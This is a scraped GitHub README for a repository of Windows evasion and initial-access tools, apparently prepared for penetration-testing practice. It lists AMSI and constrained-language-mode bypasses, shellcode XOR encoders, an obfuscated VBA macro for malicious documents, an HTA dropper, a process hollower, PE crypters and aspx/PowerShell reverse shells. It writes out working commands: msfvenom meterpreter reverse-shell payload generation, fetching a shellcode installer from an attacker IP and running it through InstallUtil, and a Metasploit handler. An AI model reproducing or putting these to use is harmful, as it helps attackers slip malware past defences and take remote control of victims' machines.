Skip to content

Karmaz95/evasion

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

25 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

TOOLS:

  • Platform.sln => platform.exe
PE with bypasses - use with x86/shikata_ga_nai | x64/zutto_dekiru encoder + XOREncrypt.sln
  • XOREncrypt.sln => XOREncrypt.exe
A second layer shellcode XOR encoer.
  • holcrimson.sln => holcrimson.dll
Unamanged DLL for in memory loading - use with x86/shikata_ga_nai | x64/zutto_dekiru encoder + XOREncrypt.sln
  • Doc1.doc - example Doc1.doc from medium article.
  • VBA_XORencrypt.ps1 - Powershell script for encrypting 4 parts of VBA macro.
  • Platform.txt - PS script
1. AMSI bypass
2. Download DLL
3. Load DLL to memory.
4. Run DLL.
  • macro.vba - for Doc1.doc
Obfuscated VBA macro for docm / doc attack.
  • platform.aspx - for IIS webserver attack
Use with msfvenom encrypted generated shellcode + XOREncrypt.sln
  • platform.hta - dropper.
Use with obfuscated PE ShellCode Runner
Download to disk and run - this is undetected.
  • isma.txt - use "-arg=1".split for arguemnts parsing.
1. AMSI bypass
2. Download PE
3. Load PE to memory.
4. Run PE.
  • HOLLOW.sln => HOLLOW.exe - Process Hollower.
1. Generate encrypted shellcode
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$ip LPORT=443 EXITFUNC=thread -f csharp --encrypt xor --encrypt-key w -o shell.cs
2. Place inside and compile it.
  • ConfuserEX.zip - for .NET PE obfuscation.
  • Hyperion.zip - Crypter for PE obfuscation.
hyperion.exe input.exe output.exe
bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2
  • bypass-clm.exe - CLM Bypass => spawn PowerShell in current terminal.
  • clm_enc.txt - Same as bypass-clm.exe but base64 encoded with certutil and you can pass b64 encoded commands:
certutil -decode clm_enc.txt clm.exe
# Example of b64 below checks if the PowerShell run in FullLanguage
clm.exe "JABFAHgAZQBjAHUAdABpAG8AbgBDAG8AbgB0AGUAeAB0AC4AUwBlAHMAcwBpAG8AbgBTAHQAYQB0AGUALgBMAGEAbgBnAHUAYQBnAGUATQBvAGQAZQA="
msfvenom -p windows/meterpreter/reverse_http LHOST=tun0 LPORT=443 -f csharp -o shell.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /unsafe /platform:x86 /out:install_shellcode.exe .\install_shellcode.cs
iwr -uri 'http://$ip/install_shellcode.exe' -outfile C:/asd/install_shellcode.exe;
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U install_shellcode.exe
  • shell.aspx - simple reverse shell for .aspx upload.
sudo msfconsole -x "use multi/handler; set LHOST tun0;set LPORT 443; exploit -j;"
  • shell.ps1 - simple reverse shell in PowerShell.
Change IP and PORT.
  • openssl.cnf - file to replace the original one for MD4 support on Kali Linux.
Replace the /etc/ssl/openssl.cnf

SCORE